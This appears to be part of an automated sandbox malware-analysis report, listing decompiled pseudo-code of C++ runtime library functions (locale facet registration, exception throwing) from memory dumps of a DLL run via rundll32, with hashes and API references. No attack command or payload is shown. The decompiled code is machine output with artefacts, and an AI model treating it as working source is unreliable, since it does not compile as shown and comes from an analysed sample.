                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: c9718dbf1462f6be3960883d7f56220b603d32b925b0a5ba70420e688d8e2fa2
                          • Instruction ID: ce6fa70b025c62a46b7333a44e3d8e80089853d9f02c56ddcf649cf6b11fcda8
                          • Opcode Fuzzy Hash: c9718dbf1462f6be3960883d7f56220b603d32b925b0a5ba70420e688d8e2fa2
                          • Instruction Fuzzy Hash: DF11C17991052D9BCB00EBE0C894AEEB77BBF44B18F244909E4106B2D0DB74AA45CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E204747, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 83%
                          			E6E204747(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t18;
				intOrPtr* _t19;
				intOrPtr* _t39;
				intOrPtr* _t44;
				void* _t47;

				E6E2200AC(0x6e26816f, __ebx, __edi, __esi, 0x18);
				E6E206653(_t47 - 0x14, 0);
				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
				_t44 =  *0x6e2dce7c; // 0x2bf9478
				 *((intOrPtr*)(_t47 - 0x10)) = _t44;
				_t18 = E6E1E161C(0x6e2dce90);
				_t35 =  *((intOrPtr*)(_t47 + 8));
				_t19 = E6E1E171B( *((intOrPtr*)(_t47 + 8)), _t18);
				_t46 = _t19;
				if(_t19 != 0) {
					L5:
					E6E2066BA(_t47 - 0x14);
					return E6E220075(_t46);
				} else {
					if(_t44 == 0) {
						_push( *((intOrPtr*)(_t47 + 8)));
						_push(_t47 - 0x10);
						__eflags = E6E204F5F(__ebx, _t35, __edx, _t44, _t46) - 0xffffffff;
						if(__eflags == 0) {
							_t39 = _t47 - 0x20;
							E6E1E1438(_t39);
							E6E223D74(_t47 - 0x20, 0x6e2c3504);
							asm("int3");
							 *_t39 = __edx;
							return _t39;
						} else {
							_t46 =  *((intOrPtr*)(_t47 - 0x10));
							 *((intOrPtr*)(_t47 - 0x10)) = _t46;
							 *(_t47 - 4) = 1;
							E6E206FD3(__eflags, _t46);
							 *((intOrPtr*)( *_t46 + 4))();
							 *0x6e2dce7c = _t46;
							goto L5;
						}
					} else {
						_t46 = _t44;
						goto L5;
					}
				}
			}








                          0x6e20474e
                          0x6e204758
                          0x6e20475d
                          0x6e204766
                          0x6e20476c
                          0x6e20476f
                          0x6e204774
                          0x6e204778
                          0x6e20477d
                          0x6e204781
                          0x6e2047bc
                          0x6e2047bf
                          0x6e2047cb
                          0x6e204783
                          0x6e204785
                          0x6e20478b
                          0x6e204791
                          0x6e204799
                          0x6e20479c
                          0x6e2047cc
                          0x6e2047cf
                          0x6e2047dd
                          0x6e2047e2
                          0x6e2047e3
                          0x6e2047e7
                          0x6e20479e
                          0x6e20479e
                          0x6e2047a1
                          0x6e2047a5
                          0x6e2047a9
                          0x6e2047b3
                          0x6e2047b6
                          0x00000000
                          0x6e2047b6
                          0x6e204787
                          0x6e204787
                          0x00000000
                          0x6e204787
                          0x6e204785

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20474E
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E204758
                          • int.LIBCPMT ref: 6E20476F
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E2047A9
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2047BF
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E2047DD
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: 9b0f32715b87e54a1759bc649193e9872409a344bc4b164295a414ea61986916
                          • Instruction ID: 6873a31d7f9ff45d95f5d602d1511cfdbbcd75cbc473d54ac18203b7e4455c53
                          • Opcode Fuzzy Hash: 9b0f32715b87e54a1759bc649193e9872409a344bc4b164295a414ea61986916
                          • Instruction Fuzzy Hash: 3111E379E0051D9FCB05DBE0C854AEDB7BAAF15714F108918E524AB2D0DBB49A45C790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F7FF, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E20F7FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t125;
				signed int _t126;
				void* _t138;
				void* _t151;
				void* _t164;
				void* _t177;
				void* _t190;
				void* _t203;
				void* _t216;
				signed int _t321;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				void* _t374;

				_t346 = __edx;
				_t265 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t374 - 0x14, 0);
				_t357 =  *0x6e2c6dd8; // 0x0
				 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
				 *(_t374 - 0x10) = _t357;
				_t125 = E6E1E161C(0x6e2c6d84);
				_t268 =  *((intOrPtr*)(_t374 + 8));
				_t126 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t125);
				_t348 = _t126;
				if(_t126 != 0) {
					L5:
					E6E2066BA(_t374 - 0x14);
					return E6E220075(_t348);
				} else {
					if(_t357 == 0) {
						_push( *((intOrPtr*)(_t374 + 8)));
						_push(_t374 - 0x10);
						__eflags = E6E211339(__ebx, _t268, __edx, _t348, _t357) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t374 - 0x20);
							E6E223D74(_t374 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t348, _t357, 0x14);
							E6E206653(_t374 - 0x14, 0);
							_t358 =  *0x6e2c6db0; // 0x0
							 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
							 *(_t374 - 0x10) = _t358;
							_t138 = E6E1E161C(0x6e2c6d64);
							_t275 =  *((intOrPtr*)(_t374 + 8));
							_t349 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t138);
							__eflags = _t349;
							if(_t349 != 0) {
								L12:
								E6E2066BA(_t374 - 0x14);
								return E6E220075(_t349);
							} else {
								__eflags = _t358;
								if(_t358 == 0) {
									_push( *((intOrPtr*)(_t374 + 8)));
									_push(_t374 - 0x10);
									__eflags = E6E2113A1(_t265, _t275, __edx, _t349, _t358) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t374 - 0x20);
										E6E223D74(_t374 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t265, _t349, _t358, 0x14);
										E6E206653(_t374 - 0x14, 0);
										_t359 =  *0x6e2c6ddc; // 0x0
										 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
										 *(_t374 - 0x10) = _t359;
										_t151 = E6E1E161C(0x6e2c6d88);
										_t282 =  *((intOrPtr*)(_t374 + 8));
										_t350 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t151);
										__eflags = _t350;
										if(_t350 != 0) {
											L19:
											E6E2066BA(_t374 - 0x14);
											return E6E220075(_t350);
										} else {
											__eflags = _t359;
											if(_t359 == 0) {
												_push( *((intOrPtr*)(_t374 + 8)));
												_push(_t374 - 0x10);
												__eflags = E6E211409(_t265, _t282, __edx, _t350, _t359) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t374 - 0x20);
													E6E223D74(_t374 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t265, _t350, _t359, 0x14);
													E6E206653(_t374 - 0x14, 0);
													_t360 =  *0x6e2c6de0; // 0x0
													 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
													 *(_t374 - 0x10) = _t360;
													_t164 = E6E1E161C(0x6e2c6d8c);
													_t289 =  *((intOrPtr*)(_t374 + 8));
													_t351 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t164);
													__eflags = _t351;
													if(_t351 != 0) {
														L26:
														E6E2066BA(_t374 - 0x14);
														return E6E220075(_t351);
													} else {
														__eflags = _t360;
														if(_t360 == 0) {
															_push( *((intOrPtr*)(_t374 + 8)));
															_push(_t374 - 0x10);
															__eflags = E6E211471(_t265, _t289, _t346, _t351, _t360) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t374 - 0x20);
																E6E223D74(_t374 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t265, _t351, _t360, 0x14);
																E6E206653(_t374 - 0x14, 0);
																_t361 =  *0x6e2c6dfc; // 0x0
																 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																 *(_t374 - 0x10) = _t361;
																_t177 = E6E1E161C(0x6e2c6da8);
																_t296 =  *((intOrPtr*)(_t374 + 8));
																_t352 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t177);
																__eflags = _t352;
																if(_t352 != 0) {
																	L33:
																	E6E2066BA(_t374 - 0x14);
																	return E6E220075(_t352);
																} else {
																	__eflags = _t361;
																	if(_t361 == 0) {
																		_push( *((intOrPtr*)(_t374 + 8)));
																		_push(_t374 - 0x10);
																		__eflags = E6E2114EC(_t265, _t296, _t346, _t352, _t361) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t374 - 0x20);
																			E6E223D74(_t374 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t265, _t352, _t361, 0x14);
																			E6E206653(_t374 - 0x14, 0);
																			_t362 =  *0x6e2c6dcc; // 0x0
																			 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																			 *(_t374 - 0x10) = _t362;
																			_t190 = E6E1E161C(0x6e2c6d80);
																			_t303 =  *((intOrPtr*)(_t374 + 8));
																			_t353 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t190);
																			__eflags = _t353;
																			if(_t353 != 0) {
																				L40:
																				E6E2066BA(_t374 - 0x14);
																				return E6E220075(_t353);
																			} else {
																				__eflags = _t362;
																				if(_t362 == 0) {
																					_push( *((intOrPtr*)(_t374 + 8)));
																					_push(_t374 - 0x10);
																					__eflags = E6E211558(_t265, _t303, _t346, _t353, _t362) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t374 - 0x20);
																						E6E223D74(_t374 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t265, _t353, _t362, 0x14);
																						E6E206653(_t374 - 0x14, 0);
																						_t363 =  *0x6e2c6e00; // 0x0
																						 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																						 *(_t374 - 0x10) = _t363;
																						_t203 = E6E1E161C(0x6e2c6dac);
																						_t310 =  *((intOrPtr*)(_t374 + 8));
																						_t354 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t203);
																						__eflags = _t354;
																						if(_t354 != 0) {
																							L47:
																							E6E2066BA(_t374 - 0x14);
																							return E6E220075(_t354);
																						} else {
																							__eflags = _t363;
																							if(_t363 == 0) {
																								_push( *((intOrPtr*)(_t374 + 8)));
																								_push(_t374 - 0x10);
																								__eflags = E6E2115C4(_t265, _t310, _t346, _t354, _t363) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t374 - 0x20);
																									E6E223D74(_t374 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t265, _t354, _t363, 0x14);
																									E6E206653(_t374 - 0x14, 0);
																									_t364 =  *0x6e2c6dd0; // 0x0
																									 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																									 *(_t374 - 0x10) = _t364;
																									_t216 = E6E1E161C(0x6e2c6d60);
																									_t317 =  *((intOrPtr*)(_t374 + 8));
																									_t355 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t216);
																									__eflags = _t355;
																									if(_t355 != 0) {
																										L54:
																										E6E2066BA(_t374 - 0x14);
																										return E6E220075(_t355);
																									} else {
																										__eflags = _t364;
																										if(_t364 == 0) {
																											_push( *((intOrPtr*)(_t374 + 8)));
																											_push(_t374 - 0x10);
																											__eflags = E6E21162A(_t265, _t317, _t346, _t355, _t364) - 0xffffffff;
																											if(__eflags == 0) {
																												_t321 = _t374 - 0x20;
																												E6E1E1438(_t321);
																												E6E223D74(_t374 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e26851f, _t265, _t355, _t364, 4);
																												_t365 = _t321;
																												 *(_t374 - 0x10) = _t365;
																												 *((intOrPtr*)(_t365 + 4)) =  *((intOrPtr*)(_t374 + 0xc));
																												_push( *((intOrPtr*)(_t374 + 0x14)));
																												_t119 = _t374 - 4;
																												 *_t119 =  *(_t374 - 4) & 0x00000000;
																												__eflags =  *_t119;
																												 *_t365 = 0x6e26c0c4;
																												 *((char*)(_t365 + 0x28)) =  *((intOrPtr*)(_t374 + 0x10));
																												E6E21542F(_t265, _t321, _t346, _t355, _t365,  *_t119);
																												return E6E220075(_t365,  *((intOrPtr*)(_t374 + 8)));
																											} else {
																												_t355 =  *(_t374 - 0x10);
																												 *(_t374 - 0x10) = _t355;
																												 *(_t374 - 4) = 1;
																												E6E206FD3(__eflags, _t355);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t355 + 4))))();
																												 *0x6e2c6dd0 = _t355;
																												goto L54;
																											}
																										} else {
																											_t355 = _t364;
																											goto L54;
																										}
																									}
																								} else {
																									_t354 =  *(_t374 - 0x10);
																									 *(_t374 - 0x10) = _t354;
																									 *(_t374 - 4) = 1;
																									E6E206FD3(__eflags, _t354);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t354 + 4))))();
																									 *0x6e2c6e00 = _t354;
																									goto L47;
																								}
																							} else {
																								_t354 = _t363;
																								goto L47;
																							}
																						}
																					} else {
																						_t353 =  *(_t374 - 0x10);
																						 *(_t374 - 0x10) = _t353;
																						 *(_t374 - 4) = 1;
																						E6E206FD3(__eflags, _t353);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t353 + 4))))();
																						 *0x6e2c6dcc = _t353;
																						goto L40;
																					}
																				} else {
																					_t353 = _t362;
																					goto L40;
																				}
																			}
																		} else {
																			_t352 =  *(_t374 - 0x10);
																			 *(_t374 - 0x10) = _t352;
																			 *(_t374 - 4) = 1;
																			E6E206FD3(__eflags, _t352);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t352 + 4))))();
																			 *0x6e2c6dfc = _t352;
																			goto L33;
																		}
																	} else {
																		_t352 = _t361;
																		goto L33;
																	}
																}
															} else {
																_t351 =  *(_t374 - 0x10);
																 *(_t374 - 0x10) = _t351;
																 *(_t374 - 4) = 1;
																E6E206FD3(__eflags, _t351);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t351 + 4))))();
																 *0x6e2c6de0 = _t351;
																goto L26;
															}
														} else {
															_t351 = _t360;
															goto L26;
														}
													}
												} else {
													_t350 =  *(_t374 - 0x10);
													 *(_t374 - 0x10) = _t350;
													 *(_t374 - 4) = 1;
													E6E206FD3(__eflags, _t350);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t350 + 4))))();
													 *0x6e2c6ddc = _t350;
													goto L19;
												}
											} else {
												_t350 = _t359;
												goto L19;
											}
										}
									} else {
										_t349 =  *(_t374 - 0x10);
										 *(_t374 - 0x10) = _t349;
										 *(_t374 - 4) = 1;
										E6E206FD3(__eflags, _t349);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t349 + 4))))();
										 *0x6e2c6db0 = _t349;
										goto L12;
									}
								} else {
									_t349 = _t358;
									goto L12;
								}
							}
						} else {
							_t348 =  *(_t374 - 0x10);
							 *(_t374 - 0x10) = _t348;
							 *(_t374 - 4) = 1;
							E6E206FD3(__eflags, _t348);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t348 + 4))))();
							 *0x6e2c6dd8 = _t348;
							goto L5;
						}
					} else {
						_t348 = _t357;
						goto L5;
					}
				}
			}






























                          0x6e20f7ff
                          0x6e20f7ff
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f830
                          0x6e20f835
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F806
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F810
                          • int.LIBCPMT ref: 6E20F827
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20F861
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F881
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F89F
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: a386594008cd40e924b6c70d0c9b65f6336abb5a3e409ae73e54fdea3402d8aa
                          • Instruction ID: 8688bbfb5126637dbdccf3455e9659dd8b3f6ee28c6a2945f365496b19e5a522
                          • Opcode Fuzzy Hash: a386594008cd40e924b6c70d0c9b65f6336abb5a3e409ae73e54fdea3402d8aa
                          • Instruction Fuzzy Hash: F1110A75D1052DCBCF01EBE0C894AEEB77BAF45B14F240904D4106B2D0DB749A84C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F41B, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20F41B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t209;
				signed int _t210;
				void* _t222;
				void* _t235;
				void* _t248;
				void* _t261;
				void* _t274;
				void* _t287;
				void* _t300;
				void* _t313;
				void* _t326;
				void* _t339;
				void* _t352;
				void* _t365;
				void* _t378;
				signed int _t549;
				signed int _t595;
				signed int _t596;
				signed int _t597;
				signed int _t598;
				signed int _t599;
				signed int _t600;
				signed int _t601;
				signed int _t602;
				signed int _t603;
				signed int _t604;
				signed int _t605;
				signed int _t606;
				signed int _t607;
				signed int _t609;
				signed int _t610;
				signed int _t611;
				signed int _t612;
				signed int _t613;
				signed int _t614;
				signed int _t615;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t619;
				signed int _t620;
				signed int _t621;
				signed int _t622;
				signed int _t623;
				void* _t638;

				_t592 = __edx;
				_t451 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t638 - 0x14, 0);
				_t609 =  *0x6e2c6df0; // 0x0
				 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
				 *(_t638 - 0x10) = _t609;
				_t209 = E6E1E161C(0x6e2c6d9c);
				_t454 =  *((intOrPtr*)(_t638 + 8));
				_t210 = E6E1E171B( *((intOrPtr*)(_t638 + 8)), _t209);
				_t594 = _t210;
				if(_t210 != 0) {
					L5:
					E6E2066BA(_t638 - 0x14);
					return E6E220075(_t594);
				} else {
					if(_t609 == 0) {
						_push( *((intOrPtr*)(_t638 + 8)));
						_push(_t638 - 0x10);
						__eflags = E6E211057(__ebx, _t454, __edx, _t594, _t609) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t638 - 0x20);
							E6E223D74(_t638 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t594, _t609, 0x14);
							E6E206653(_t638 - 0x14, 0);
							_t610 =  *0x6e2c6dc0; // 0x0
							 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
							 *(_t638 - 0x10) = _t610;
							_t222 = E6E1E161C(0x6e2c6d74);
							_t461 =  *((intOrPtr*)(_t638 + 8));
							_t595 = E6E1E171B( *((intOrPtr*)(_t638 + 8)), _t222);
							__eflags = _t595;
							if(_t595 != 0) {
								L12:
								E6E2066BA(_t638 - 0x14);
								return E6E220075(_t595);
							} else {
								__eflags = _t610;
								if(_t610 == 0) {
									_push( *((intOrPtr*)(_t638 + 8)));
									_push(_t638 - 0x10);
									__eflags = E6E2110BF(_t451, _t461, __edx, _t595, _t610) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t638 - 0x20);
